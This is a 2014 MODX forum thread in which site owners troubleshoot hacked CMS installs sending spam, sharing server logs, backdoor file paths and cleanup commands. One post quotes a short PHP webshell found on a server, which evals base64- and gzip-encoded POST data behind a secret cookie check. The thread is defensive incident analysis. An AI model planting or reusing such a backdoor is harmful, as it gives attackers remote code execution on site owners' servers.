We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 33186
    • 17 Posts
    Hello,

    Today i noticed that some .js files from some sites with the latest modx evolution 1.0.14 are infected with the script (see attachment).

    My question is how could this can happen and how can i prevent this?





    • It's possible your site still has files from previous MODX installs, and one of those files was used to exploit the site. You should check your log files around the time that file was created.
        Patrick | Server Wrangler
        About Me: Website | TweetsMODX Hosting
        • 28173
        • 409 Posts
        Similar hack on 4 websites under Evo 1.0.14.

        On the postfix queue, I have this :
        0B11416431      784 Sat Sep 13 23:09:13  [email protected]
        (delivery temporarily suspended: lost connection with mta7.am0.yahoodns.net[98.138.112.37] while sending RCPT TO)
                                                 [email protected]
        
        05DC71640D      791 Sat Sep 13 23:09:13  [email protected]
        (delivery temporarily suspended: lost connection with mta7.am0.yahoodns.net[98.138.112.37] while sending RCPT TO)
                                                 [email protected]
        
        8B30F16405      784 Sat Sep 13 23:09:12  [email protected]
        (delivery temporarily suspended: lost connection with mta7.am0.yahoodns.net[98.138.112.37] while sending RCPT TO)
                                                 [email protected]
        
        9CB9C16409      791 Sat Sep 13 23:09:12  [email protected]
        (delivery temporarily suspended: lost connection with mta7.am0.yahoodns.net[98.138.112.37] while sending RCPT TO)
                                                 [email protected]
        
        7EEB6162FD      798 Sat Sep 13 23:09:12  [email protected]
        (delivery temporarily suspended: lost connection with mta7.am0.yahoodns.net[98.138.112.37] while sending RCPT TO)
                                                 [email protected]
        


        On the apache log of this domain, I have found this :
        77.232.92.131 - - [13/Sep/2014:23:03:36 +0200] "POST /manager/media/ImageEditor/assets/blog.php HTTP/1.1" 200 7526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
        77.232.92.131 - - [13/Sep/2014:23:03:48 +0200] "POST /manager/media/ImageEditor/assets/blog.php HTTP/1.1" 200 4048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
        77.232.92.131 - - [13/Sep/2014:23:03:57 +0200] "POST /manager/media/ImageEditor/assets/blog.php HTTP/1.1" 200 7880 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
        77.232.92.131 - - [13/Sep/2014:23:04:08 +0200] "POST /manager/media/ImageEditor/assets/blog.php HTTP/1.1" 200 6922 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
        77.232.92.131 - - [13/Sep/2014:23:04:16 +0200] "POST /manager/media/ImageEditor/assets/blog.php HTTP/1.1" 200 7883 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
        77.232.92.131 - - [13/Sep/2014:23:04:24 +0200] "POST /manager/media/ImageEditor/assets/blog.php HTTP/1.1" 200 9027 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
        77.232.92.131 - - [13/Sep/2014:23:04:31 +0200] "POST /manager/media/ImageEditor/assets/blog.php HTTP/1.1" 200 7409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"


        You can see the blog.php file has attachement.

        I have deleted it to stop the spam attack




        • i had the same hack essentially, except there was a file called gallery.php under manager/mcpuk/themes if I remember correctly.

          Not sure how to stop it again. I will have to persuade the client to move to Revo I suppose.
            • 28173
            • 409 Posts
            Yes the name and the directory of the file change...

            Today, I had a new case a little bit different.
            The php file was not encrypted and the content was :
            <?php
            if(!empty($_COOKIE['__mestore']) and substr($_COOKIE['__mestore'],0,16)=='3469825000034634'){if (!empty($_POST['message']) and $message=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['message']))))){echo '<
            textarea id=areatext>';eval($message);echo '</textarea>bg';exit;}} exit;
            
            

            Maybe a clue about the attack...
            • The logs don't show the attacking vector, they show only the use of one installed php-script.

              If you want to help us to find the attacking vector, you should look when the installed file was created and mail the apache log entries around that time by forum PM to me or to to [email protected].
                • 28173
                • 409 Posts
                OK I will next time (probably in few days...)
                  • 18389
                  • 169 Posts
                  I have the same as the original post.

                  The files that my host found were:
                  assets/snippets/maxigallery/imagemask/include.php -file last modified 8/7/14
                  assets/snippets/maxigallery/watermark/config.php -file last modified 8/7/14
                  assets/galleries/61/gallery.php -file last modified 9/12/14

                  I am on Evo 1.0.14

                  In my host's error logs I found a "backdoor.list" that contained:

                  siteroot/assets/images/ce2ea3430.php
                  siteroot/assets/site/h5n8k1.php


                  I would like to note also that the snippet "ajax search" was not involved as I delete that snippet from the manager and the related folders and files via ftp when I initially install Evo 1.0.14 as a habit now, due to previous vulnerabilities. [ed. note: markoj last edited this post 9 years, 6 months ago.]
                    www.markojokic.com
                    • 48536
                    • 5 Posts
                    As far as i can see it seems this is becomming a serious issue wich have been reported a month ago.

                    http://forums.modx.com/thread/92600/malicious-files-detected-on-my-server-account

                    Can somebody find in their access logs where the files come from (compare date of the files with the logs)

                    Cause of the difference between hack and starting of spam ( a few weeks) I can't find it in our logs
                    • Hi there,

                      some of my sites got hacked, too. The malicious files at the server look similar to yours. Spamming started some days ago, but the bad files have a timestamp of January 25th in 2011.

                      By now, I've had 3 or 4 hacked sites. Some Revo, some Evo. The Revo hack was noticed by a hosters IDS (intrusion detection system) so we could react quickly.

                      What I learned from the server logs (revo 2.2.13) was the time and target of the attack:
                      5.61.42.211,-,-,[06/Jun/2014:13:18:26 +0200],"GET /assets/xPDO.idx.php HTTP/1.1",404,0,Germany,-,Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
                      5.61.42.211,-,-,[06/Jun/2014:13:18:33 +0200],"GET /assets/xPDO.idx.php HTTP/1.1",200,647,Germany,-,Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0
                      5.61.42.211,-,-,[06/Jun/2014:13:18:38 +0200],"POST /assets/xPDO.idx.php HTTP/1.1",200,18803,Germany,http://***/assets/xPDO.idx.php,Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0
                      5.61.42.211,-,-,[06/Jun/2014:13:18:40 +0200],"POST /assets/xPDO.idx.php HTTP/1.1",200,13304,Germany,http://***/assets/xPDO.idx.php,Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0
                      5.61.42.211,-,-,[06/Jun/2014:13:18:42 +0200],"POST /assets/xPDO.idx.php HTTP/1.1",200,15667,Germany,http://***/assets/xPDO.idx.php,Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0
                      5.61.42.211,-,-,[06/Jun/2014:13:18:43 +0200],"POST /assets/xPDO.idx.php HTTP/1.1",200,16281,Germany,http://***/assets/xPDO.idx.php,Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0
                      5.61.42.211,-,-,[06/Jun/2014:13:18:49 +0200],"POST /assets/xPDO.idx.php HTTP/1.1",200,16774,Germany,http://***/assets/xPDO.idx.php,Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0

                      5.61.42.211 is the attacking server. I can be sure of that because of two reasons:
                      1) I wasnt able to find out who it belongs to. Domain is separated from IP, IP is separated from the hoster etc... No chance of getting that guy. There was a german domain connected to that IP and I tried to contact the owner at the given contac data, without success.
                      2) This IP is hosting domains which are used to offer pills. The attacker installed a plugin at my server to redirect users to this server.

                      I also learned that at 13:18:26 the GET request for /assets/xPDO.idx.php resulted in a 404, not there. And the attacker claimed to be a google bot - this time. Seven seconds later, the file was present.

                      I called a friend and he was able to find the files, copy them and run them on his box. See attachment "webshell1".

                      Some weeks later, other sites were hacked and my own server sent out spam again. This time it was one revo and one evo site. Different webshells were uploaded this time. /assets/plugins/qm/css/list.php for instance or /core/packages/core/modUserGroup/code.php

                      Today I checked my server again and one of the sites way spamming again.
                       mailq | egrep '^--'
                      told me that there were 50,000 emails queued to be sent out.
                      postsuper -d ALL 
                      deleted the queue. But when I checked after some time (~30 seconds), there were about 12 mails again. So I searched for the bad files again and ran into a lot of them. Including list.php.

                      I renamed list.php to __list.php and the mails stopped immediately. So my next step is to check the database for hidden users (with no username - I had that once!) wipe the server and install MODX from scratch.

                      If you have a server with many sites on it you will have trouble finding out where to look at.
                      You can delete the whole mailqueue and open fresh mails. They may content a user ID of the servers user. That might lead you to the correct website on your server. The Email will contain the users ID in the header. With
                      cat /etc/passwd | grep <ID goes here>
                      you can find out the username.

                      If you are interested in the actual attack, I can offer a part of the server log. It is containing over 900 requests, 225 GET and the rest POST. I cant make it public as it might be traced back to the clients site.

                      I am hopeful that we can make an end to those attacks. At least we can develop stuff to trace the attacker or at least prevent damage to site and performance.

                      Cheers,

                      Guido